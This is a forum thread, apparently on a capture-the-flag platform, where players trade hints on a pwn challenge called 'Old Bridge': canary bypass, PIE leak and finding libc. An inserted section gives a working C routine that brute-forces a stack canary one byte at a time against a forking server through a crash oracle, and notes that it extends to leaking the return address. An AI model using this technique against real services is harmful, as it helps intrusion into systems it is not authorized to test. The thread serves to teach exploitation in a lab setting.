[Pwn] Old Bridge

I can bypass the canary, but I cannot find a way to leak the libc address. Please give me a hint.

Hi,
I’m stuck after defeating the canary, and I have the base address of the application. The buffer limit blocks me from doing anything I tried to get a shell. Could someone PM me with a hint please?

Have you gotten any further @tare05 ?

I’m stuck at the same place. I have bruteforced the canary and have leaked some info that makes me able to calculate the base address of the application. But since I only have a few bytes to play with, I don’t have space for the rop chains I want.

If anyone has some nudges that don’t spoil the whole solution, feel free to send me a PM.

@ghostride said:

Have you gotten any further @tare05 ?

I’m stuck at the same place. I have bruteforced the canary and have leaked some info that makes me able to calculate the base address of the application. But since I only have a few bytes to play with, I don’t have space for the rop chains I want.

If anyone has some nudges that don’t spoil the whole solution, feel free to send me a PM.

If you want a nudge, hit me with a PM or on Mattermost: NSFocus

Hi …, any advice about bypassing the stack limit? Feel free to PM me.

Is it possible to get a reverse shell from the Docker?

@TrimechAd said:

Is it possible to get a reverse shell from the Docker?

Yes it is

Lovely challenge, a good example of how dangerous forks can be with a fairly high level of security options enabled on your ELF binaries.
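
The fork hazard mentioned in the post above, as an added example that is not code from the thread or from the challenge: a forked child inherits the parent's stack canary, so a wrong guess kills only that child and the next connection sees the same value again. That turns a 2^64 secret into at most 256 tries per byte. The `child_survives` oracle and the canary value below are constructed stand-ins; against a real target the oracle is "send the overflow over the socket and check whether the connection dies with a stack-smashing abort or returns normally".

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for the remote fork server. Each connection is
 * handled by a forked child that inherits the parent's canary, so the value
 * never changes between attempts: a wrong byte aborts only that child
 * ("*** stack smashing detected ***"), a correct prefix lets it return.
 * The value itself is constructed for this example. */
#define CANARY_LEN 8
static const uint8_t k_canary[CANARY_LEN] = {0x00, 0x1f, 0x8a, 0x33,
                                             0xd4, 0x7b, 0xc2, 0x9e};
static unsigned long g_connections;

/* Oracle: overflow the buffer with n bytes of guess; did the child survive? */
bool child_survives(const uint8_t *guess, size_t n)
{
    g_connections++;
    return memcmp(guess, k_canary, n) == 0;
}

/* Recover the canary one byte at a time. Each position costs at most 256
 * connections instead of 2^56 for the remaining value. glibc keeps the
 * lowest byte zero (to stop string functions reading past it), so the first
 * position costs a single try. Returns the number of bytes recovered. */
size_t bruteforce_canary(uint8_t *out, size_t len,
                         bool (*oracle)(const uint8_t *, size_t))
{
    for (size_t i = 0; i < len; i++) {
        bool found = false;
        for (int b = 0; b < 256; b++) {
            out[i] = (uint8_t)b;
            if (oracle(out, i + 1)) {
                found = true;
                break;
            }
        }
        if (!found)
            return i; /* oracle inconsistent (canary changed?): stop here */
    }
    return len;
}

unsigned long connections_used(void) { return g_connections; }

/* Runs the whole recovery against the constructed oracle and reports whether
 * the recovered value matches what the "server" holds. */
bool demo_recovers_canary(void)
{
    uint8_t canary[CANARY_LEN] = {0};
    size_t got = bruteforce_canary(canary, CANARY_LEN, child_survives);
    return got == CANARY_LEN && memcmp(canary, k_canary, CANARY_LEN) == 0;
}

int main(void)
{
    uint8_t canary[CANARY_LEN] = {0};
    size_t got = bruteforce_canary(canary, CANARY_LEN, child_survives);
    printf("recovered %zu/%d bytes in %lu connections: ", got, CANARY_LEN,
           connections_used());
    for (size_t i = 0; i < got; i++)
        printf("%02x", canary[i]);
    printf("\n");
    return 0;
}
```

The same per-byte loop recovers the saved return address (and with it the PIE base) once the canary is in place, since the child again either crashes or returns cleanly. A server that re-executes itself per connection instead of forking would re-randomize the canary and the mapping, and the `!found` branch is where that shows up.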

Could someone possibly PM me a nudge on bypassing the PIE protection? I have a little bird sorted, but I’m struggling to leak something useful for the next step; any decent articles or papers much appreciated! :slight_smile:

I’m almost there, but I can’t find the libc with https://libc.blukat.me. Any hints?

Same as @haeSahje2u. I have a leak and I get addresses for both write and read which are the same distance apart as in normal libcs, but the addresses I get aren’t found in any libc db.

Just managed to pwn it. It was a fun ride for me; if you need a nudge, PM me here or on Twitter @Tare0x5 (I’ll probably answer faster on Twitter).

Anyone can DM me. I am close, but I need to ask something.

I have this challenge solved, however, there is a certain number at the end (the remote f*** d********* for the s*****) that appears obvious what it should be – but it isn’t. Sorry for the convoluted phrasing, no spoilers.

I’ve already asked others why this is the case, and it seems everyone just stumbled upon the final solution, with no explanation for why this is the case.

If anyone who solved it would like to discuss this, or even better already knows why, don’t hesitate to send me a message.

So I’ve solved every step of this challenge and have the exploit working locally. I just have one issue: finding the version of l**c. Assuming that since I can’t find it using a database, it must be modified? In this case, is it possible to find the offset of the functions I need (s*m, elp etc.) other than through brute force? Pretty stuck here.

@michaelv You don’t need libc if you syscall

Can anyone give a hint about what file descriptor 7 should mean to me? And the local descriptor is 4?

I need some help to find which libc the program is using.

Knowledge of libc version is not required. You have something even better in your arsenal.

@limbernie said:

Knowledge of libc version is not required. You have something even better in your arsenal.

Yep. All that’s needed is near %).
Was fun and learnt a lot of new stuff.

while not Success:
    reading
    googling
    trying